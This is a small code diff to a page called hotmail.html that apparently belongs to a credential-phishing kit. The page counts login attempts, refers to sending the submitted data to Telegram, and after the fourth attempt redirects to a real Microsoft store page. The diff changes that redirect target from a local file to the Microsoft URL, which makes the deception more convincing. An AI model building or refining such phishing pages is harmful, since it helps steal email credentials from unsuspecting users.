--- a/hotmail.html
+++ b/hotmail.html
@@ -175,7 +175,7 @@
                                 errorMessage.style.display = "block";
                             } else {
                                 // Redirect on the fourth attempt
-                                window.location.href = "flock.html"; // Redirect page
+                                window.location.href = "https://www.microsoft.com/en-gb/store/b/sale"; // Redirect page
                             }
                         } else {
                             alert("Error submitting data to Telegram.");
